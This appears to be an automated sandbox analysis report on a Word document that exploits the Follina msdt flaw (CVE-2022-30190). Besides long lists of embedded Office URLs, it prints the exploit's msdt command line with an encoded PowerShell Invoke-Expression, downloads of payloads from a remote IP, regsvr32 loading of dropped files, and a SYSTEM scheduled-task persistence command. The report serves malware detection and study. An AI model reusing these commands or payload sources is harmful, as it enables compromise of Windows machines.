                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://graph.ppe.windows.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://graph.ppe.windows.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://graph.windows.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://graph.windows.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://invites.office.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://lifecycle.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://login.microsoftonline.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://login.windows.local
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://management.azure.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://management.azure.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://messaging.engagement.office.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://messaging.office.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ncus.contentsync.
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ncus.pagecontentsync.
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://officeapps.live.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://onedrive.live.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://onedrive.live.com/embed?
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://osi.office.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://otelrules.azureedge.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office365.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office365.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://pages.store.office.com/review/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://powerlift.acompli.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://roaming.edog.
                            Source: global traffic HTTP traffic detected: GET /123.RES HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16) Accept-Encoding: gzip, deflate Host: 185.234.247.119 Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: GET /123.RES HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16) Accept-Encoding: gzip, deflate Host: 185.234.247.119 If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMT If-None-Match: "6299dd5d-1861" Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: GET /972639944.dat HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: 185.234.247.119 Connection: Keep-Alive
                            Source: 00000007.00000002.710859302.00000000032B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: 00000007.00000002.711008375.0000000003308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: 00000007.00000002.710962250.0000000003300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: 00000007.00000002.712552314.0000000003600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: Process Memory Space: msdt.exe PID: 2984, type: MEMORYSTRMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htm, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16E37148.htm, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499D447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,27_2_0499D447
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499D959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,27_2_0499D959
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042AD447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,28_2_042AD447
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042AD959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,28_2_042AD959
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AFD447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,29_2_04AFD447
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AFD959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,29_2_04AFD959
                            Source: DiagPackage.dll.mui.7.drStatic PE information: No import functions for PE file found
                            Source: DiagPackage.dll.7.drStatic PE information: No import functions for PE file found
                            Source: DiagPackage.dll.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Section loaded: sfc.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: jr3.dll
                            Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
                            Source: doc782.docxVirustotal: Detection: 28%
                            Source: doc782.docxReversingLabs: Detection: 17%
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'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'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.cmdline
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2969.tmp" "c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP"
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.cmdline
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4732.tmp" "c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP"
                            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A
                            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A
                            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.cmdline
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B1C.tmp" "c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP"
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t1.A"
                            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t1.A"
                            Source: C:\Windows\SysWOW64\msdt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32
                            Source: doc782.LNK.0.drLNK file: ..\..\..\..\..\Desktop\doc782.docx
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\{F7EB1FF3-EBC0-4416-8F4D-8BB97AA1D04B} - OProcSessId.dat
                            Source: classification engineClassification label: mal100.troj.expl.evad.winDOCX@31/32@0/2
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499E400 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,27_2_0499E400
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File read: C:\Users\desktop.ini
                            Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499B96A CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,27_2_0499B96A
                            Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{B70640EC-1F2A-4D99-888E-C770DEC0899F}
                            Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{536EBBDF-F89D-4065-AD6A-DA847C33EC3A}
                            Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{536EBBDF-F89D-4065-AD6A-DA847C33EC3A}
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1548:120:WilError_01
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE File read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exe File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
                            Source: Binary string: amstream.pdb source: explorer.exe, 00000020.00000003.675706177.0000000005221000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.674870677.0000000004DAB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.678475892.0000000004D51000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000020.00000003.675706177.0000000005221000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.674870677.0000000004DAB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.678475892.0000000004D51000.00000004.00000800.00020000.00000000.sdmp
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 27_2_049AB02E push ebx; ret 27_2_049AB02F
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 27_2_049901B0 pushad ; iretd 27_2_049901B1
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 27_2_049AAD7C push cs; iretd 27_2_049AAE52
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 27_2_049AAE7E push cs; iretd 27_2_049AAE52
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 27_2_049ACB5D push esi; iretd 27_2_049ACB62
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 28_2_042BB02E push ebx; ret 28_2_042BB02F
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 28_2_042BAD7C push cs; iretd 28_2_042BAE52
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 28_2_042A01B0 pushad ; iretd 28_2_042A01B1
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 28_2_042BAE7E push cs; iretd 28_2_042BAE52
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 28_2_042BCB5D push esi; iretd 28_2_042BCB62
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 28_2_00830790 push edx; ret 28_2_00831250
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 28_2_0082A002 push cs; iretd 28_2_00829FD6
